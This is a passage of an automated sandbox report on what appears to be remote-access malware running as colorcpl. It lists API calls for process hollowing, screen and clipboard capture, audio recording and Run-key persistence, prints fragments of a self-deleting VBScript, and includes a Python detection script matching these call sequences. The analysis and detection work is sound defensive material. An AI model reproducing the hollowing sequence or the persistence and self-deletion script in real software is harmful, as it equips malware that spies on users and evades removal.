                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32DD
                                                                                                                              • ExitProcess.KERNEL32 ref: 046A32EF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1703294689-0
                                                                                                                              • Opcode ID: 4fd9882b26684c23c0143434b2788c26dc207830b1b4f08a778cac6c9f199021
                                                                                                                              • Instruction ID: 7b30b8dc84c7e5e42b821723d81ebd17781409db89d184cc9f1fa0324303ca48
                                                                                                                              • Opcode Fuzzy Hash: 4fd9882b26684c23c0143434b2788c26dc207830b1b4f08a778cac6c9f199021
                                                                                                                              • Instruction Fuzzy Hash: 82E0BF71850648ABCF116F64D909A983F69FF45345F144014FE0546321EB3AEDD5CE84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0466B711
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0466B71D
                                                                                                                              • CloseClipboard.USER32 ref: 0466B725
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$CloseDataOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2058664381-0
                                                                                                                              • Opcode ID: 797ce4e61174362dd8c6c04ff741caf7934b389af63aaf7a998d394a34484a0e
                                                                                                                              • Instruction ID: 32cf264a4b997fbefe117e5eb138cdcf62563ec1ec88e28e8a720f4d0b605c14
                                                                                                                              • Opcode Fuzzy Hash: 797ce4e61174362dd8c6c04ff741caf7934b389af63aaf7a998d394a34484a0e
                                                                                                                              • Instruction Fuzzy Hash: 2CE0EC71645330DFD7209B60D848BAE7A54DF61F51F408418B506DA294FA64BC44CBE5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 04694C6B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2325560087-3916222277
                                                                                                                              • Opcode ID: 7181fed418daa24ad34a715ad46785911bc02a599cc182b877890179d8608d5c
                                                                                                                              • Instruction ID: ee09a6b7a76eb631b8a748e07ec127eb7ce6ce55faecad4b139fc163b069c525
                                                                                                                              • Opcode Fuzzy Hash: 7181fed418daa24ad34a715ad46785911bc02a599cc182b877890179d8608d5c
                                                                                                                              • Instruction Fuzzy Hash: 9E516E75D05208AFDB14CFA9D48579ABBF4FB48314F14806BD815E7240E7B8AD45CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04671F37,?,?,?,?,?), ref: 046720E7
                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046720EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3859560861-0
                                                                                                                              • Opcode ID: bee71ab382e47186d2893e5d737b1f6088a2ad3aa79595c000b1c6bb9e9b070e
                                                                                                                              • Instruction ID: 4a0f2f18f6a6178980c1172ac38ecce670788f142f440ac3405916f1092587c0
                                                                                                                              • Opcode Fuzzy Hash: bee71ab382e47186d2893e5d737b1f6088a2ad3aa79595c000b1c6bb9e9b070e
                                                                                                                              • Instruction Fuzzy Hash: 00113972400A11EFDB309F64DD94827BBEAFF04B15304896EE19656921EB32F890DF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0469487A), ref: 04694B4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: f13c82a7bdf70318cb89628af0bae1149a975f090afb492010a17d1b69fe4d85
                                                                                                                              • Instruction ID: aaa7deeced3c741c4a57f99919299220116a527e68c6d7291e173c9e40b06c46
                                                                                                                              • Opcode Fuzzy Hash: f13c82a7bdf70318cb89628af0bae1149a975f090afb492010a17d1b69fe4d85
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: PkGNG
                                                                                                                              • API String ID: 0-263838557
                                                                                                                              • Opcode ID: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                              • Instruction ID: 7662130c95fcf600325f9933485e10490298c763f9e5a16eb707cbf84df9181b
                                                                                                                              • Opcode Fuzzy Hash: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                              • Instruction Fuzzy Hash: FEE04F31000358FFCF916F54DC4CE593B7AEB40262F050864F90446135CB39DC52CB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 04678E90
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04678E9D
                                                                                                                                • Part of subcall function 04679325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04679355
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 04678F13
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F2A
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F2D
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04678F30
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 04678F51
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F62
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F65
                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 04678F89
                                                                                                                              • GetIconInfo.USER32(?,?), ref: 04678FBD
                                                                                                                              • DeleteObject.GDI32(?), ref: 04678FEC
                                                                                                                              • DeleteObject.GDI32(?), ref: 04678FF9
                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 04679006
                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0467903C
                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 04679068
                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 046790D5
                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 04679144
                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04679168
                                                                                                                              • DeleteDC.GDI32(?), ref: 0467917C
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0467917F
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04679182
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0467918D
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04679241
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 04679248
                                                                                                                              • DeleteDC.GDI32(?), ref: 04679258
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04679263
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                                              • String ID: DISPLAY
                                                                                                                              • API String ID: 479521175-865373369
                                                                                                                              • Opcode ID: ce8f232767b4fdb27db6952ba9914fe79e387aa8b881737129c7b74b460a6d9f
                                                                                                                              • Instruction ID: 667b2c7faf5128d5eaedf65c91208eb3f43fc4e0478bcfb87a7d340b772f64ae
                                                                                                                              • Opcode Fuzzy Hash: ce8f232767b4fdb27db6952ba9914fe79e387aa8b881737129c7b74b460a6d9f
                                                                                                                              • Instruction Fuzzy Hash: 8FC150715083409FE720DF24D848B6BBBE9EF89754F00491DFA8997250FB34AD48CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

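The per-function API lists in this report are the raw material for capability triage: the GDI entry above (CreateDCA on "DISPLAY", CreateCompatibleBitmap, BitBlt, GetDIBits) is a screen grab read back as pixels, the clipboard entry above reads CF_UNICODETEXT (0x0D) rather than writing it, and the next entry resolves ZwCreateSection/ZwMapViewOfSection/ZwUnmapViewOfSection from ntdll by name, spawns a child with dwCreationFlags 0x00000004 (CREATE_SUSPENDED), reads its memory, writes it, patches the thread context and resumes it, which is the process-hollowing sequence. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses bullets in the report's own format and matches ordered API subsequences against three hand-written rules. The rule names, the subsequence heuristic and the choice of which arguments to check are my assumptions; the bullets embedded as sample input are copied from this page's entries (the benign CRT abort routine is included to show it is not flagged). A rule match is a lead for the analyst, not proof: it checks ordering within one function's listing, not data flow between calls.

```python
"""Added example: rule-based triage of Joe Sandbox per-function API lists.

Bullets look like (constructed from this report):
    • CreateProcessW.KERNEL32(00000000,?,...,00000004,...), ref: 04678217
      • Part of subcall function 04679325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04679355
Rules below are the author's heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"              # argument list is optional (ExitProcess.KERNEL32 ref: ...)
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple
    ref: str


@dataclass(frozen=True)
class Step:
    """One required call; arg_value is positional when arg_index is set, else anywhere."""
    api: str
    arg_index: Optional[int] = None
    arg_value: Optional[str] = None

    def matches(self, call: Call) -> bool:
        if call.api != self.api:
            return False
        if self.arg_value is None:
            return True
        if self.arg_index is None:
            return self.arg_value in call.args
        return len(call.args) > self.arg_index and call.args[self.arg_index] == self.arg_value


RULES = {
    # ntdll section APIs resolved by name, CREATE_SUSPENDED (0x4) child, PEB read,
    # image written, entry point patched via the thread context, child resumed.
    "process_hollowing_section_mapping": (
        Step("GetModuleHandleA", arg_value="ZwUnmapViewOfSection"),
        Step("CreateProcessW", arg_index=5, arg_value="00000004"),
        Step("GetThreadContext"),
        Step("ReadProcessMemory"),
        Step("WriteProcessMemory"),
        Step("SetThreadContext"),
        Step("ResumeThread"),
    ),
    # Display DC copied into a compatible bitmap and read back as raw pixels.
    "screen_capture_gdi": (
        Step("CreateDCA", arg_index=0, arg_value="DISPLAY"),
        Step("CreateCompatibleBitmap"),
        Step("BitBlt"),
        Step("GetDIBits"),
    ),
    # 0x0D is CF_UNICODETEXT: clipboard text is read.
    "clipboard_text_read": (
        Step("OpenClipboard"),
        Step("GetClipboardData", arg_index=0, arg_value="0000000D"),
        Step("CloseClipboard"),
    ),
}


def parse_api_list(text: str) -> list:
    """Turn the bullet lines of one function entry into Call records, skipping headings."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",") if a.strip())
        calls.append(Call(m.group("api"), m.group("module").upper(), args, m.group("ref") or ""))
    return calls


def rule_matches(calls, steps) -> bool:
    """True if each step is satisfied by a call that comes after the previous step's call."""
    it = iter(calls)
    for step in steps:
        for call in it:
            if step.matches(call):
                break
        else:
            return False
    return True


def classify(text: str) -> list:
    calls = parse_api_list(text)
    return [name for name, steps in RULES.items() if rule_matches(calls, steps)]


# Sample input constructed from this report's function entries.
HOLLOWING = """\
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 04678136
• GetProcAddress.KERNEL32(00000000), ref: 04678139
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0467815E
• GetProcAddress.KERNEL32(00000000), ref: 04678161
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04678217
• GetThreadContext.KERNEL32(?,00000000), ref: 04678245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0467826B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0467840B
• SetThreadContext.KERNEL32(?,00000000), ref: 04678428
• ResumeThread.KERNEL32(?), ref: 04678435
"""
SCREENSHOT = """\
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 04678E90
• CreateCompatibleDC.GDI32(00000000), ref: 04678E9D
  • Part of subcall function 04679325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04679355
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 04678F13
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0467903C
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04679168
"""
CLIPBOARD = """\
• OpenClipboard.USER32(00000000), ref: 0466B711
• GetClipboardData.USER32(0000000D), ref: 0466B71D
• CloseClipboard.USER32 ref: 0466B725
"""
CRT_ABORT = """\
• GetCurrentProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32D6
• TerminateProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32DD
• ExitProcess.KERNEL32 ref: 046A32EF
"""

if __name__ == "__main__":
    for label, text in [("hollowing", HOLLOWING), ("screenshot", SCREENSHOT),
                        ("clipboard", CLIPBOARD), ("crt_abort", CRT_ABORT)]:
        print(f"{label:10s} -> {classify(text) or ['(no rule)']}")
```

Matching is by ordered subsequence, so unrelated calls between the steps (the GetProcAddress calls, the subcall bullet, the DrawIcon/GetIconInfo cursor handling) do not break a match, while the CRT abort routine, which also terminates a process, matches nothing because it never creates or writes one. Positional argument checks are only as good as the report's argument recovery: "?" means the sandbox could not resolve the value, so a rule keyed on such a slot would silently miss.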
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 04678136
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04678139
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0467814A
• GetProcAddress.KERNEL32(00000000), ref: 0467814D
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0467815E
• GetProcAddress.KERNEL32(00000000), ref: 04678161
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 04678172
• GetProcAddress.KERNEL32(00000000), ref: 04678175
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04678217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0467822F
• GetThreadContext.KERNEL32(?,00000000), ref: 04678245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0467826B
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 046782ED
• TerminateProcess.KERNEL32(?,00000000), ref: 04678301
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 04678341
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0467840B
• SetThreadContext.KERNEL32(?,00000000), ref: 04678428
• ResumeThread.KERNEL32(?), ref: 04678435
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0467844C
• GetCurrentProcess.KERNEL32(?), ref: 04678457
• TerminateProcess.KERNEL32(?,00000000), ref: 04678472
• GetLastError.KERNEL32 ref: 0467847A
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 4188446516-3035715614
• Opcode ID: 533acaecce93a8deda69aa9c88447f34f28bdc5e8595e33eb1b003b308082dca
• Instruction ID: b7eee930b25b026853bf27d41ef813829def4bcd46c6aae5b86a7d082d4bc807
• Opcode Fuzzy Hash: 533acaecce93a8deda69aa9c88447f34f28bdc5e8595e33eb1b003b308082dca
• Instruction Fuzzy Hash: F5A14AB1644301AFEB109F64DC89B6ABBE8FF48748F00192EF64597290E7B4EC54CB65
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
  • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0466D51D
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0466D530
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0466D549
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0466D579
  • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
  • Part of subcall function 0466B8AC: UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
  • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
  • Part of subcall function 0467C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
• ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000000), ref: 0466D7C4
• ExitProcess.KERNEL32 ref: 0466D7D0
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-1536747724
• Opcode ID: 3a762472ff8c2182c51bddff09258e89ed0a304c13f0f4c099321ff84d0bf6fc
• Instruction ID: 8634259ea7daac6b037a6e9bda8d5751e5ff4efa91b5ef2de7f31e83c8d51574
• Opcode Fuzzy Hash: 3a762472ff8c2182c51bddff09258e89ed0a304c13f0f4c099321ff84d0bf6fc
• Instruction Fuzzy Hash: 109161716042005BE714FB64D8A09FFB7E9AF9561AF50042DA44B932A0FF30BD49CA9A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,046D50E4,00000003), ref: 04672494
• ExitProcess.KERNEL32(00000000), ref: 046724A0
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0467251A
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04672529
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04672534
• CloseHandle.KERNEL32(00000000), ref: 0467253B
• GetCurrentProcessId.KERNEL32 ref: 04672541
• PathFileExistsW.SHLWAPI(?), ref: 04672572
• GetTempPathW.KERNEL32(00000104,?), ref: 046725D5
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 046725EF
• lstrcatW.KERNEL32(?,.exe), ref: 04672601
  • Part of subcall function 0467C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04672641
• Sleep.KERNEL32(000001F4), ref: 04672682
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04672697
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 046726A2
• CloseHandle.KERNEL32(00000000), ref: 046726A9
• GetCurrentProcessId.KERNEL32 ref: 046726AF
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$WDH$exepath$open$temp_
• API String ID: 2649220323-3088914985
• Opcode ID: a2aa3f822618ebbca783c735f480d3b13939dd8fe1eb92e04424019c4fa57614
• Instruction ID: aeef169b8f69f348e4630523a62a431485a318ad03bb5d4da37b49ffb0165597
• Opcode Fuzzy Hash: a2aa3f822618ebbca783c735f480d3b13939dd8fe1eb92e04424019c4fa57614
• Instruction Fuzzy Hash: BF515571E40219ABEB10ABA0DC99EFE336DDB45754F004599F502A7280FF78AE85CA94
Uniqueness
• Uniqueness Score: -1.00%

APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0467B13C
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0467B150
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,Function_000660A4), ref: 0467B178
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,046D4EE0,00000000), ref: 0467B18E
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0467B1CF
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0467B1E7
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0467B1FC
• SetEvent.KERNEL32 ref: 0467B219
• WaitForSingleObject.KERNEL32(000001F4), ref: 0467B22A
• CloseHandle.KERNEL32 ref: 0467B23A
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0467B25C
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0467B266
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
• API String ID: 738084811-1354618412
• Opcode ID: ae3faa0fa398938bfc58c467657d31773efb18f122e5e5c8fec30128574eddd4
• Instruction ID: 38e8cf7a2ddb4b14e0082cfc4bf8aa8a218b22f147137a096e58fe594addee3e
• Opcode Fuzzy Hash: ae3faa0fa398938bfc58c467657d31773efb18f122e5e5c8fec30128574eddd4
• Instruction Fuzzy Hash: D7518C716442046FE314BB70DCA5ABF7B9CEB9569DF00001DF54A92594FF30BD09CAAA
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
  • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1A5
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0466D1B8
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1E8
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1F7
  • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
  • Part of subcall function 0466B8AC: UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
  • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
  • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
• ShellExecuteW.SHELL32(00000000,open,00000000,046C6468,046C6468,00000000), ref: 0466D412
• ExitProcess.KERNEL32 ref: 0466D419
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-3018399277
• Opcode ID: 93fd36f7d1289b7a0459bb9998584cfd6f10f3869c15e9ad0ac5197591090506
• Instruction ID: 388427bb8997fa8d0d40e1188d661909b37ef629d0df89ab81aecc08e5ab2aa9
• Opcode Fuzzy Hash: 93fd36f7d1289b7a0459bb9998584cfd6f10f3869c15e9ad0ac5197591090506
• Instruction Fuzzy Hash: C5819E716082405BE714FB60D8609FFB3E9AF96609F10082DA49793290FF74BD4DCB9A
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04661AD9
                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 04661B03
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 04661B13
                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 04661B23
                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 04661B33
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04661B43
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04661B54
• WriteFile.KERNEL32(00000000,046D2AAA,00000002,00000000,00000000), ref: 04661B65
